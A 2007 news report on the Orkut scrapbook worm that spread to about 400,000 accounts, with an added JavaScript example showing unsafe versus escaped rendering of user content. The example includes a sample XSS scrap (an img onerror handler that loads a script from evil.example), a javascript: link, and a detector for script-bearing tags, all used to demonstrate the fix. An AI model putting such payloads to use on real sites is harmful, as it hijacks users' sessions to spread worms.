Orkut worm affects 400,000 accounts

Dec 19, 2007 18:41 GMT  ·  By

Google's social network Orkut has suffered what appears to be the most serious attack on the service to date, with no fewer than 400,000 accounts compromised. Alice Decker of Trend Micro reported today that many registered Orkut users received a malicious e-mail telling them that a new Scrapbook entry had been added for them. Naturally, the e-mail carried a link that was supposed to take them to the new message. Clicking the URL opened a page that displayed the Portuguese text "2008 vem aí que ele comece mto bem para vc" (roughly, "2008 is coming, may it start really well for you").

This is where the trouble starts. According to Trend Micro, an account was compromised the moment its owner clicked the malicious link: right after the message above had been displayed, the entry deleted itself and added the victim to the Orkut community "Infectados pelo Virus do Orkut" ("Infected by the Orkut Virus").

Moreover, "it then downloads and executes a heavily obfuscated Javascript which in turn sends a copy of the original Scrapbook post to all of the user's Orkut contacts, so that they too will be infected by the threat. At last count the group had over 400,000 users who had been infected", Alice Decker wrote.
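The behaviour described above is the classic pattern of a self-propagating script worm in user-generated content: a scrap rendered into other users' pages as live HTML runs in each viewer's browser with that viewer's session, and can therefore re-post itself to the viewer's contacts. The example below is added here to illustrate that root cause and its fix; it is not Orkut's code and not taken from the Trend Micro analysis, and the article does not state how the worm's script was injected, so the vulnerable renderer is an assumption about the general class, not a description of Orkut's actual flaw. The sample scraps, the `evil.example` URL and all function names are constructed for this illustration.

```javascript
// Added example (not Orkut's code, not from the Trend Micro write-up).
// Models the root cause behind a self-propagating "scrap" worm: user-supplied
// scrapbook content rendered into other users' pages as live HTML. If the
// content can carry markup that runs script, every viewer's session executes
// it and can be made to re-post the same scrap to that viewer's contacts.

// Encode the five characters that let text break out of an HTML text or
// double/single-quoted attribute context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Allow-list the link scheme: only absolute http(s) URLs survive.
// "javascript:" links and unparsable strings are dropped (null).
function safeHref(link) {
  try {
    const u = new URL(link);
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
  } catch {
    return null;
  }
}

// Vulnerable renderer (assumed pattern): trusts the scrap body and link as-is.
function renderScrapUnsafe(scrap) {
  return `<div class="scrap"><b>${scrap.author}</b>: ${scrap.text}` +
         (scrap.link ? ` <a href="${scrap.link}">link</a>` : '') + `</div>`;
}

// Hardened renderer: encode every value for its context, allow-list the URL.
function renderScrapSafe(scrap) {
  const href = safeHref(scrap.link);
  return `<div class="scrap"><b>${escapeHtml(scrap.author)}</b>: ${escapeHtml(scrap.text)}` +
         (href ? ` <a href="${escapeHtml(href)}" rel="noopener noreferrer">link</a>` : '') +
         `</div>`;
}

// Inspect the emitted HTML for tags that would execute script: <script>,
// any on*= event handler attribute, or a javascript: href. Only real tag
// boundaries ("<name ...>") are examined, so escaped payload text such as
// "&lt;img ... onerror=..." is correctly ignored. Returns the offending tags.
function findActiveContent(html) {
  const findings = [];
  for (const m of html.matchAll(/<(\w+)([^>]*)>/g)) {
    const [tag, name, attrs] = m;
    if (/^script$/i.test(name) ||
        /\son\w+\s*=/i.test(attrs) ||
        /\shref\s*=\s*["']?\s*javascript:/i.test(attrs)) {
      findings.push(tag);
    }
  }
  return findings;
}

// Constructed sample scraps. The worm-style one carries an event handler that
// loads a remote script plus a javascript: link; the benign one mimics the
// bait text quoted in the article with an ordinary http link.
const worm = {
  author: 'amigo',
  text: '<img src=x onerror="document.location=\'http://evil.example/worm.js\'">',
  link: 'javascript:void(0)',
};
const benign = {
  author: 'amigo',
  text: '2008 vem aí que ele comece mto bem para vc',
  link: 'http://www.orkut.com/',
};

console.log('unsafe, worm  :', findActiveContent(renderScrapUnsafe(worm)));
console.log('safe,   worm  :', findActiveContent(renderScrapSafe(worm)));
console.log('safe,   benign:', renderScrapSafe(benign));
```

With the unsafe renderer the worm scrap yields two live script vectors (the `<img onerror>` and the `javascript:` link); with the hardened renderer the same input is inert text and the bogus link is dropped, while the benign scrap and its http link render normally. The string check is only there to make the difference visible offline; the real test of an output encoder is rendering in a browser.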

The description of the Orkut community that collects the affected users claims that no files or data were compromised, and that the author only wanted to prove how easily Google's social network could be turned into a real web threat. All it took was a single click to read a new Scrapbook entry.

For now the exploit is no longer live, since the author has removed the JavaScript from the web. "It appears from both the script which we have analysed, and this description that this script was designed purely to spread, rather than for more malicious purposes normally associated with this type of attack. The author has since pulled the malicious Javascript from the web, having apparently gotten his point across", the Trend Micro expert continued.

Attacks of this kind can easily become dangerous, but they are also somewhat useful, because they expose vulnerabilities in web services before people with worse intentions get to exploit them. Take today's example: the script ran in every victim's browser with that victim's Orkut session, and it used that access only to copy itself to the victim's contacts. What if the author had swapped in a payload that read or altered profile data, posted on the victim's behalf, or sent victims on to a page hosting browser exploits in order to take over their computers?